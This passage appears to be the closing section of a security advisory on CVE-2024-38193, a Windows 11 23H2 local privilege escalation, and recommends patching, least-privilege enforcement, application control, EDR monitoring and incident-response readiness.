- Your endpoint security vendor or EDR provider for detection signatures and behavioral rules tuned to this issue.
Summary and recommended next steps
Address CVE-2024-38193 by patching affected Windows 11 23H2 systems as the top priority. In parallel, strengthen endpoint defenses through least-privilege enforcement, application control, EDR monitoring, and targeted detection rules for anomalous privilege escalations. Maintain an incident response posture that can capture forensic artifacts and contain suspected compromises quickly. Avoid relying solely on perimeter controls — LPEs are local threats and require robust endpoint hygiene.
For technical teams, consult Microsoft’s advisory for precise affected versions and remediation steps. For security operations, prioritize detection of unauthorized token elevations and anomalous kernel-level activity and ensure sensitive systems are patched first.